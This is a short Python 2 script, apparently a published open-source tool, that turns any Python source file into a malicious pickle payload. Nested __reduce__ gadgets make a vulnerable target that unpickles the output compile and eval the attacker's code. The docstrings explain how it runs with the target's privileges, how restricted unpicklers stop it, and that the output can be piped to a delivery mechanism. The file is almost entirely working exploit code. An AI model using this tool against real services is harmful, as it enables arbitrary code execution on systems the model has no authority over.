Script to serialize arbitrary Python code and exploit a vulnerable pickle deserialization
#!/usr/bin/env python2 | |
# -*- coding: utf-8 -*- | |
__author__ = "Foo-Manroot" | |
__license__ = "GPL" | |
__version__ = "1.0" | |
""" | |
Small script that serializes, with pickle, custom Python code so that it runs when a vulnerable target unpickles the output.
Copyright © 2018 Foo-Manroot | |
This program is free software: you can redistribute it and/or modify | |
it under the terms of the GNU General Public License as published by | |
the Free Software Foundation, either version 3 of the License, or | |
(at your option) any later version. | |
This program is distributed in the hope that it will be useful, | |
but WITHOUT ANY WARRANTY; without even the implied warranty of | |
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the | |
GNU General Public License for more details. | |
You should have received a copy of the GNU General Public License | |
along with this program. If not, see <http://www.gnu.org/licenses/>. | |
""" | |
import sys | |
import cPickle as pickle | |
class Compiler (object):
    """
    Deferred ``compile()`` call, expressed as a pickle gadget.

    pickle cannot serialize code objects, so instead of shipping compiled
    bytecode this class ships a ``__reduce__`` that tells the *unpickler* to
    call ``compile(code, '<string>', 'exec')`` itself. Only the source text
    crosses the wire; the compile step happens on the side that unpickles.

    :param code: Python source text to be compiled at unpickling time.
    """
    def __init__ (self, code):
        self.code = code

    def __reduce__ (self):
        # ``(callable, args)`` form: the unpickler looks ``compile`` up by
        # name (``__builtin__.compile`` on Python 2, mapped to
        # ``builtins.compile`` by Python 3's import fix-ups) and calls it
        # with these arguments, yielding a code object. ``'exec'`` mode is
        # used so the payload may contain statements, not just an expression.
        source = self.code
        filename = '<string>'
        mode = 'exec'
        return (compile, (source, filename, mode))
class Exploit (object):
    """
    Pickle gadget that runs arbitrary Python source when it is unpickled.

    ``__reduce__`` makes the unpickler call ``eval`` on the code object that a
    nested :class:`Compiler` gadget builds from ``code``. Nothing runs when
    this object is created or pickled; execution happens inside the process
    that calls ``pickle.loads`` / ``Unpickler.load`` on the serialized output,
    with that process's privileges.

    Notes for use:

    * ``eval`` on a code object compiled in ``'exec'`` mode executes its
      statements and returns ``None``, so the value the target gets back from
      unpickling is ``None`` -- the payload has already run by then, but the
      target may well fail afterwards when it tries to use that result.
    * ``eval`` and ``compile`` are resolved by the unpickler through its
      ``find_class`` hook; an unpickler that restricts that hook (an allow-list
      ``Unpickler`` subclass) will refuse this gadget.
    * NOTE(review): the globals the payload sees at ``eval`` time are whatever
      the unpickling frame supplies -- do not rely on names from the target's
      module; ``import`` everything the payload needs inside ``code``.

    :param code: Python source text (statements allowed) to run on the target.
    """
    def __init__ (self, code):
        self.code = code

    def __reduce__ (self):
        # Inner gadget becomes compile(code, '<string>', 'exec') on the
        # target; the outer reduce feeds its result straight to eval.
        compiled_on_target = Compiler (self.code)
        return (eval, (compiled_on_target, ))
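def main (argv):
    """
    Command-line entry point: read a source file and emit its pickle payload.

    :param argv: full argument vector (normally ``sys.argv``); ``argv[1]`` is
        the path of the file holding the Python source to serialize, or
        ``-h`` / ``--help`` to print usage.
    :returns: process exit status -- 0 on success, 1 when usage was printed.
    :raises IOError: if the source file cannot be opened or read.
    """
    if (len (argv) <= 1
        or argv [1].lower () in ("-h", "--help")):
        print ("Script to serialize with pickle a code to exploit a vulnerable target")
        print ("Foo-Manroot - 2018\n")
        print ("Usage:")
        print (argv [0] + " [-h | --help | FILE]\n")
        print ("The available options are:")
        print ("\tFILE")
        print ("\t\tA file with the Python source code to be serialized")
        print ("\t-h")
        print ("\t--help")
        print ("\t\tShows this help message")
        return 1

    # Context manager so the handle is closed deterministically rather than
    # whenever the interpreter gets around to collecting it.
    with open (argv [1], "r") as src:
        code = src.read ()

    # The serialized gadget is the only thing written to stdout, so the output
    # can be piped straight to whatever delivers it to the target. Use
    # sys.stdout.write instead of print so no trailing newline is appended:
    # byte-exact output matters once the payload is encoded or length-checked.
    # NOTE: cPickle.dumps with no protocol argument emits protocol 0 (ASCII);
    # pass an explicit protocol here if the target only accepts a binary one.
    # This script is Python 2 only (cPickle, str-based stdout), as per shebang.
    sys.stdout.write (pickle.dumps (Exploit (code)))
    sys.stdout.flush ()
    return 0


if __name__ == "__main__":
    sys.exit (main (sys.argv))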